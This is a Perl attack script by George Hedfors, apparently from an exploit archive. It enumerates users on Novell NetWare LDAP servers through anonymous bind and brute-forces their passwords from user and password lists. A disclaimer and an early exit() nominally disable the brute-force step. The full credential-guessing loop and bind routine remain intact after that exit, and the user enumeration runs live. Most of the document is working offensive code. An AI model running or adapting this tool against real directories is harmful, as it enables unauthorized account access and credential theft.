LDAP user enumerator and brute forcer for Novell Netware.
7645ed276ced0f883e7e581ee878097725c1d06305d95d200b235c29d40c9e34
#!/usr/bin/perl
##########################################################################
##
## NetWare LDAP Brute by
## George Hedfors <george.hedfors@NOSPAMMING.pinion.se>
##
## http://www.pinion.se
##
## Disclaimer: This program may only be used for educational purposes!
## Offensive parts of the script has been disabled.
##
#
use Switch;
use Net::LDAP;
$| = 1;
print "NetWare LDAP Brute by George Hedfors @ Pinion\n";
print "[x] This program may only be used for educational purposes!\n";
for($i = 0; $i < @ARGV; $i++) {
switch($ARGV[$i]) {
case "-h" {
$host = $ARGV[$i+1];
$i++;
}
case "-r" {
$rootdn = $ARGV[$i+1];
$i++;
}
case "-u" {
$usrs = $ARGV[$i+1];
$i++;
}
case "-p" {
$pwds = $ARGV[$i+1];
$i++;
}
case "-t" {
$port = $ARGV[$i+1];
$i++;
}
case "-s" {
$ssl++;
}
case "-e" {
$enumusr++;
}
case "-n" {
$same++;
}
}
}
if(!$host or (!$usrs and !$enumusr)) {
usage();
}
if(!$port) {
if($ssl) {
$port = 636;
} else {
$port = 389;
}
}
if($ssl) {
$scheme = "ldaps";
} else {
$scheme = "ldap";
}
if(!$rootdn) {
print "[!] No Root DN. Assuming default 'o=hq'.\n";
$rootdn = "o=hq";
}
if($enumusr) {
print "[*] Trying to enumerate users...";
$ldap = Net::LDAP->new($host, scheme => $scheme, port => $port) || die "\n\n[!] Unable to connect: $!\n";
$mesg = $ldap->bind();
if($mesg->code eq 0) {
print " Anonymous bind worked!\n";
$mesg = $ldap->search(base => $rootdn,
scope => 'one',
filter => '(|(objectclass=person))'
);
foreach ($mesg->entries) {
if($_->exists('uid')) {
$u = $_->get_value('uid');
$u =~ s/\ /\_/g;
push(@uarr, $u);
push(@users, lc($u));
}
}
foreach (@uarr) {
print "[+] " . $_ . "\n";
}
if(@users eq 0) {
print "[!] No users enumerated.\n";
} else {
print "[*] " . @uarr . " user(s) enumerated.\n";
}
} else {
print " failed.\n";
}
}
if($usrs) {
if(open(IN, "< $usrs")) {
while(<IN>) {
$_ =~ s/[\n|\r]//g;
push(@users, $_);
}
close(IN);
} else {
push(@users, $usrs);
}
}
if(!@users) {
print STDERR "[!] No users, exiting.\n";
exit;
}
if($pwds) {
if(open(IN, "< $pwds")) {
while(<IN>) {
$_ =~ s/[\n|\r]//g;
push(@passwds, $_);
}
close(IN);
}
}
if(!@passwd and !$same) {
print "\n[!] No passwords to try, exiting.\n";
exit;
}
print "\n[x] Offensive functions has been disabled!\n";
exit;
print "\n[*] Starting brute...\n";
foreach $user (@users) {
$ret = ();
if($same) {
$passwd = $user;
$ret = mytry();
}
if($ret ne 1) {
if(@passwds) {
foreach $passwd (@passwds) {
mytry();
}
} elsif($pwds) {
$passwd = $pwds;
mytry();
}
}
}
print "\n";
if(@working gt 0) {
print "[*] Valid credentials:\n";
foreach (@working) {
print "[+] " . $_ . "\n";
}
}
exit;
sub usage() {
print STDERR "syntax: $0 [options]\n";
print STDERR "\t-h <hostname>\n";
print STDERR "\t-t <port>\tDefault: 389\n";
print STDERR "\t-s\t\tLDAPS. Default port change to: 636\n";
print STDERR "\t-r <rootdn>\tDefault: o=hq\n";
print STDERR "\t-u <username or file>\n";
print STDERR "\t-p <password or file>\n";
print STDERR "\t-n\t\tTry same password as username.\n";
print STDERR "\t-e\t\tEnumerate users.\n\n";
print STDERR "\tNote: Bruteforcing LDAP is slow!\n\n";
exit;
}
sub mytry() {
print "[*] Trying " . $user . " / " . $passwd . "...";
$ldap = Net::LDAP->new($host, scheme => $scheme, port => $port) || die "\n\n[!] Unable to connect: $!\n";
if($ssl) {
$ldap->start_tls(verify => "none");
}
my $dn = "cn=" . $user . ", " . $rootdn;
$mesg = $ldap->bind($dn,
password => $passwd,
port => $port
);
if($mesg->code ne 0) {
if($mesg->code ne 49) {
print " disabled or unable to logon. Return (" . $mesg->code . ")\n";
} else {
print "\n";
}
return;
} else {
print " OK!\n";
$ldap->unbind;
push(@working, $user . "/" . $passwd);
return 1;
}
}